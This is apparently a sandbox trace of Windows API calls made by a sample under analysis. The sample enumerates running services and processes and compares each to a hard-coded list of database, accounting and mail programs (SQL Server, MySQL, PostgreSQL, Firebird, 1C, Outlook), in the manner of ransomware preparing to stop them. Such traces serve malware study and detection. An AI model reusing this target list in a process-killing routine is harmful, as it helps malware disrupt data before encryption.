	[0136.650] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b1f6a0, Size=0x20) returned 0x7b1f6d8
	[0136.650] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x1c) returned 0x7b1fd48
	[0136.650] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x16) returned 0x7b1f700
	[0136.650] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x1a) returned 0x7b1fd70
	[0136.650] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc) returned 0x7b41298
	[0136.650] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x4) returned 0x7b1f720
	[0136.650] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x40) returned 0x7b20180
	[0136.650] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b1f720, Size=0x8) returned 0x7b1f720
	[0136.650] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x3c) returned 0x7b201c8
	[0136.650] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b1f720, Size=0x10) returned 0x7b1f6a0
	[0136.650] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x14) returned 0x7b41a18
	[0136.650] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x18) returned 0x7b41a38
	[0136.650] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b1f6a0, Size=0x20) returned 0x7b41a58
	[0136.651] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x24) returned 0x7b41a80
	[0136.651] lstrlenW (lpString="1c8.exe;1cv77.exe;outlook.exe;postgres.exe;mysqld-nt.exe;mysqld.exe;sqlservr.exe;") returned 81
	[0136.651] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b41808 | out: hHeap=0x7ab0000) returned 1
	[0136.651] lstrlenW (lpString="FirebirdGuardianDefaultInstance;FirebirdServerDefaultInstance;sqlwriter;mssqlserver;sqlserveradhelper;") returned 102
	[0136.651] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b41910 | out: hHeap=0x7ab0000) returned 1
	[0136.651] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x7b42da8
	[0136.661] EnumServicesStatusExW (in: hSCManager=0x7b42da8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x18f94c, lpServicesReturned=0x18f964, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x18f94c, lpServicesReturned=0x18f964, lpResumeHandle=0x0) returned 0
	[0136.661] GetLastError () returned 0xea
	[0136.661] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc9a) returned 0x7b44828
	[0136.661] EnumServicesStatusExW (in: hSCManager=0x7b42da8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x7b44828, cbBufSize=0xc9a, pcbBytesNeeded=0x18f94c, lpServicesReturned=0x18f964, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x7b44828, pcbBytesNeeded=0x18f94c, lpServicesReturned=0x18f964, lpResumeHandle=0x0) returned 1
	[0136.661] CloseServiceHandle (hSCObject=0x7b42da8) returned 1
	[0136.665] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0136.665] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0136.665] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0136.665] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0136.665] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0136.665] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0136.665] lstrlenW (lpString="AudioSrv") returned 8
	[0136.665] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0136.665] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0136.665] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0136.665] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0136.665] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0136.666] lstrlenW (lpString="BFE") returned 3
	[0136.666] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0136.666] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0136.666] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0136.666] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0136.666] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0136.666] lstrlenW (lpString="CryptSvc") returned 8
	[0136.666] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0136.666] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0136.666] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0136.666] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0136.666] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0136.666] lstrlenW (lpString="CscService") returned 10
	[0136.666] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0136.666] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0136.666] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0136.666] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0136.666] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0136.666] lstrlenW (lpString="DcomLaunch") returned 10
	[0136.666] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0136.666] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0136.666] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0136.666] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0136.666] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0136.666] lstrlenW (lpString="Dhcp") returned 4
	[0136.666] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0136.666] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0136.666] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0136.666] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0136.666] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0136.666] lstrlenW (lpString="Dnscache") returned 8
	[0136.666] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0136.666] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0136.666] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0136.666] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0136.666] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0136.667] lstrlenW (lpString="DPS") returned 3
	[0136.667] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0136.667] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0136.667] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0136.667] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0136.667] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0136.667] lstrlenW (lpString="eventlog") returned 8
	[0136.667] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0136.667] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0136.667] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0136.667] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0136.667] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0136.667] lstrlenW (lpString="EventSystem") returned 11
	[0136.667] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0136.667] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0136.667] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0136.667] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0136.667] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0136.667] lstrlenW (lpString="gpsvc") returned 5
	[0136.667] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0136.667] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0136.667] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0136.667] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0136.667] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0136.667] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0136.667] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0136.667] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0136.667] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0136.667] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0136.667] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0136.667] lstrlenW (lpString="lmhosts") returned 7
	[0136.667] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0136.667] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0136.667] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0136.667] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0136.668] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0136.668] lstrlenW (lpString="MMCSS") returned 5
	[0136.668] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0136.668] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0136.668] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0136.668] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0136.668] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0136.668] lstrlenW (lpString="MpsSvc") returned 6
	[0136.668] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0136.668] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0136.668] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0136.668] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0136.668] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0136.668] lstrlenW (lpString="NlaSvc") returned 6
	[0136.668] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0136.668] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0136.668] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0136.668] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0136.668] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0136.668] lstrlenW (lpString="nsi") returned 3
	[0136.668] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0136.668] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0136.668] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0136.668] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0136.668] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0136.668] lstrlenW (lpString="PcaSvc") returned 6
	[0136.668] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0136.668] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0136.668] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0136.668] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0136.668] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0136.668] lstrlenW (lpString="PlugPlay") returned 8
	[0136.668] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0136.668] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0136.668] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0136.668] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0136.669] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0136.669] lstrlenW (lpString="Power") returned 5
	[0136.669] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0136.669] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0136.669] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0136.669] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0136.669] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0136.669] lstrlenW (lpString="ProfSvc") returned 7
	[0136.669] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0136.669] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0136.669] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0136.669] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0136.669] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0136.669] lstrlenW (lpString="RpcEptMapper") returned 12
	[0136.669] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0136.669] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0136.669] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0136.669] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0136.669] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0136.669] lstrlenW (lpString="RpcSs") returned 5
	[0136.669] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0136.669] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0136.669] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0136.669] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0136.669] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0136.669] lstrlenW (lpString="SamSs") returned 5
	[0136.669] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0136.669] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0136.669] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0136.669] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0136.669] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0136.669] lstrlenW (lpString="Schedule") returned 8
	[0136.669] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0136.669] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0136.669] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0136.669] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0136.670] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0136.670] lstrlenW (lpString="SENS") returned 4
	[0136.670] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0136.670] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0136.670] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0136.670] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0136.670] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0136.670] lstrlenW (lpString="ShellHWDetection") returned 16
	[0136.670] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0136.670] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0136.670] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0136.670] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0136.670] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0136.670] lstrlenW (lpString="Spooler") returned 7
	[0136.670] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0136.670] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0136.670] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0136.670] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0136.670] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0136.670] lstrlenW (lpString="Themes") returned 6
	[0136.670] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0136.670] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0136.670] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0136.670] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0136.670] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0136.670] lstrlenW (lpString="UxSms") returned 5
	[0136.670] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0136.670] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0136.670] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0136.670] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0136.670] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0136.670] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b44828 | out: hHeap=0x7ab0000) returned 1
	[0136.670] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe4
	[0136.672] Process32FirstW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0136.673] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0136.673] lstrlenW (lpString="System") returned 6
	[0136.673] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0136.673] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0136.673] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0136.673] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0136.673] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0136.673] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0136.673] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0136.673] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0136.673] lstrlenW (lpString="smss.exe") returned 8
	[0136.673] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0136.674] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0136.674] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0136.674] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0136.674] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0136.674] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0136.674] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0136.674] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0136.674] lstrlenW (lpString="csrss.exe") returned 9
	[0136.674] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0136.674] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0136.674] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0136.674] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0136.674] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0136.674] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0136.674] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0136.674] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0136.674] lstrlenW (lpString="wininit.exe") returned 11
	[0136.674] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0136.675] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0136.675] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0136.675] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0136.675] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0136.675] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0136.675] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0136.675] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0136.675] lstrlenW (lpString="csrss.exe") returned 9
	[0136.675] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0136.675] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0136.675] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0136.675] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0136.675] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0136.675] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0136.675] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0136.675] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0136.675] lstrlenW (lpString="winlogon.exe") returned 12
	[0136.675] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1
	[0136.676] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1
	[0136.676] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1
	[0136.676] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1
	[0136.676] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1
	[0136.676] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1
	[0136.676] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1
	[0136.676] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0136.676] lstrlenW (lpString="services.exe") returned 12
	[0136.676] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1
	[0136.676] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1
	[0136.676] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1
	[0136.676] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1
	[0136.676] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1
	[0136.676] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1
	[0136.676] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1
	[0136.676] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0136.676] lstrlenW (lpString="lsass.exe") returned 9
	[0136.676] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1
	[0136.676] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1
	[0136.677] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1
	[0136.677] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1
	[0136.677] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1
	[0136.677] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1
	[0136.677] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1
	[0136.677] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0136.677] lstrlenW (lpString="lsm.exe") returned 7
	[0136.677] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1
	[0136.677] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1
